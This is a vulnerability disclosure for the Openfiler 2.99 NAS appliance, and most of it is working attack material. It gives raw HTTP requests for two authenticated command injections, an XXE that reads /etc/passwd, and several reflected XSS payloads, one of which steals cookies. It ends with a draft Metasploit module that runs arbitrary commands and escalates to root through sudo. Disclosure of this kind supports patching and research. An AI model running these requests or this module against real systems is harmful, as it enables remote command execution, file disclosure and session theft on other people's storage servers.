#Tested on Openfiler NAS/SAN Appliance version 2.99 #Author: MiDoveteMollare #Date: 10 June 2014 OS Command Injection (after authentication) #1 page: services_iscsi_target.html paramenter: password POST /admin/services_iscsi_target.html HTTP/1.1 Host: IP:446 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://IP:446/admin/services_iscsi_target.html Content-Type: application/x-www-form-urlencoded Content-Length: 83 Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password; template=classic; lng=en username=AAA&addChapUser=Add&usertype=OutgoingUser&password=aaaa`touch%20/tmp/test` OS Command Injection (after authentication) #2 page: volumes_iscsi_targets.html paramenter: newTgtName POST /admin/volumes_iscsi_targets.html HTTP/1.1 Host: IP:446 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://IP:446/admin/volumes_iscsi_targets.html Content-Type: application/x-www-form-urlencoded Content-Length: 49 Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password; template=classic; lng=en addNewTgt=Add&newTgtName=aaaa`touch%20/tmp/bbbbb` Path Traversal (after authentication) : page: system_ups.html paramenter: TinkerAjaxArgs[] POST /admin/system_ups.html HTTP/1.1 Host: IP:446 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Method: POST https://IP:446/admin/system_ups.html HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: https://IP:446/admin/system_ups.html Content-Length: 1180 Cookie: template=classic; lng=en; subNavIscsi-targetset=true; subNavIscsi-lunmap=false; subNavIscsi-networkacl=false; subNavIscsi-chapauth=false; usercookie=openfiler; passcookie=password Connection: keep-alive Pragma: no-cache Cache-Control: no-cache TinkerAjax=addUPSDevice&TinkerAjaxr=1402385862174&TinkerAjaxArgs[]=<!DOCTYPE%20foo%20[<!ENTITY%20xxe915a7%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><tinker-query>%0a%09<object><name>devicenameinput<%2fname>%0a%09%09<value>APC%20-%20Back-UPS%20CS%20350%20USB%2fSerial%26xxe915a7%3b<%2fvalue><%2fobject>%0a%09<object><name>driverinput<%2fname>%0a%09%09<value>apcsmart<%2fvalue><%2fobject>%0a%09%09<object><name>upsstatusinput<%2fname>%0a%09%09<value>1<%2fvalue><%2fobject>%0a%09<object><name>confignameinput<%2fname>%0a%09%09<value>ups0<%2fvalue><%2fobject>%0a%09<object><name>portinput<%2fname>%0a%09%09<value>ttyS0<%2fvalue><%2fobject>%0a%09<object><name>descinput<%2fname>%0a%09%09<value>dsa<%2fvalue><%2fobject>%0a%09<object><name>sorderinput<%2fname>%0a%09%09<value>0<%2fvalue><%2fobject>%0a%09<object><name>cableinput<%2fname>%0a%09%09<value>simple<%2fvalue><%2fobject>%0a%09<object><name>sdtypeinput<%2fname>%0a%09%09<value>0<%2fvalue><%2fobject>%0a%09<object><name>configformsubm itbutton<%2fname>%0a%09%09<value>Add%20Device<%2fvalue><%2fobject>%0a%09<object><name>configformcancelbutton<%2fname>%0a%09%09<value>Cancel<%2fvalue><%2fobject>%0a%0a<%2ftinker-query>%0a Passwords are saved in clear text in cookies: HTTP/1.1 302 Found Date: Mon, 09 Jun 2014 12:09:45 GMT Server: Apache/2.2.9 (rPath) X-Powered-By: PHP/5.2.11 Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: usercookie=root; path=/; secure Set-Cookie: passcookie=mypassword; path=/; secure Cookies are not protected with HttpOnly: HTTP/1.1 200 OK Date: Sun, 02 Feb 2003 01:01:03 GMT Server: Apache/2.2.9 (rPath) X-Powered-By: PHP/5.2.11 Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: language_code=it_IT; expires=Mon, 02-Feb-2004 01:01:04 GMT; path=/ Set-Cookie: usercookie=openfiler; path=/; secure Set-Cookie: passcookie=password; path=/; secure Reflected XSS (before authentication): Tested with Chrome, not working on Firefox. https://IP:446/uptime.html?TinkerAjax=getUptime0fa3e]]%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3C![CDATA[alert%28document.cookie%29]]%3E%3C/script%3E[[&TinkerAjaxr=1402315831409 Reflected XSS (after authentication): page: services_ftp.html parameters: MaxInstances, PassivePorts, Port, ServerName, TimeoutLogin, TimeoutNoTransfer, TimeoutStalled, POST /admin/services_ftp.html HTTP/1.1 Host: IP:446 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://IP:446/admin/services_ftp.html Content-Type: application/x-www-form-urlencoded Content-Length: 262 Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password; template=classic; lng=en TimeoutIdle=600&TimesGMT=on&ServerName=FTP+Server&TimeoutStalled=3600&MaxInstances="><script>alert(1)</script>&TimeoutLogin=120&AllowForeignAddress=on&IdentLookups=on&Port=21&TimeoutNoTransfer=900&PassivePorts=55535+65534&ServerIdent=on&UseReverseDNS=on&applyftpsettings=Apply&reload=on Reflected XSS (after authentication): page: /admin/system.html [parameterd: dns1 dns2 GET /admin/system.html?dns1=1.1.1.1"><script>alert(1)</script>&dns2=1.1.1.1&gateway=DHCP+Controlled&netconf=Update&hostname=localhost.localdomain Reflected XSS (after authentication): page: /admin/volumes_iscsi_targets.html parameter: newTgtName POST /admin/volumes_iscsi_targets.html HTTP/1.1 Host: IP:446 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://IP:446/admin/volumes_iscsi_targets.html Content-Type: application/x-www-form-urlencoded Content-Length: 69 Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password; template=classic; lng=en addNewTgt=Add&newTgtName=iqn.2006-01.com.openfiler%3atsn"><script>alert(1)<%2fscript> Reflected XSS with the User-Agent HTTP header in the following pages (after authentication): /account/language.html /account/login.html /account/password.html /admin/account_groups.html /admin/account_users.html /admin/services.html /admin/services_ftp.html /admin/services_iscsi_target.html /admin/services_rsync.html /admin/system_clock.html /admin/system_info.html /admin/system_ups.html /admin/volumes_editpartitions.html /admin/volumes_iscsi_targets.html e.g: POST /account/language.html HTTP/1.1 Host: IP:446 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)--><script>alert(1)</script> PHP version leak: https://IP:446/phpinfo.html Draft of a Metasploit Module for command injection #2 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Openfiler v2.99 Volumes Iscsi Command Execution", 'Description' => %q{ This module exploits a vulnerability in Openfiler v2.99 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'openfiler' user. }, 'License' => MSF_LICENSE, 'Author' => [ ' <MiDoveteMollare[at]gmail.com>' # Discovery and exploit ], 'References' => [ ['BID', 'TBD'], ['URL', 'TBD'], ['OSVDB', 'TBD'], ['EDB', 'TBD'] ], 'DefaultOptions' => { 'ExitFunction' => 'none' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet python perl bash', } }, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Jun 10 2014", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(446), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('USERNAME', [true, 'The username for the application', 'openfiler']), OptString.new('PASSWORD', [true, 'The password for the application', 'password']) ], self.class) end def check # retrieve software version from login page vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 'uri' => '/' }) if res and res.code == 200 and res.body =~ /<strong>Distro Release: <\/strong>Openfiler [NE]SA 2\./ return Exploit::CheckCode::Appears elsif res and res.code == 200 and res.body =~ /<title>Openfiler Storage Control Center<\/title>/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout vprint_error("#{peer} - Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def on_new_session(client) client.shell_command_token("sudo /bin/bash") end def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] cmd = Rex::Text.uri_encode("#{payload.raw}&") # send payload print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => "/admin/volumes_iscsi_targets.html", 'method' => "POST", 'data' => "addNewTgt=Add&newTgtName=aaaa`#{cmd}`", 'cookie' => "usercookie=#{user}; passcookie=#{pass};", }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unknown, 'Connection failed') end if res and res.code == 302 print_good("#{peer} - Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else fail_with(Failure::Unknown, 'Sending payload failed') end end end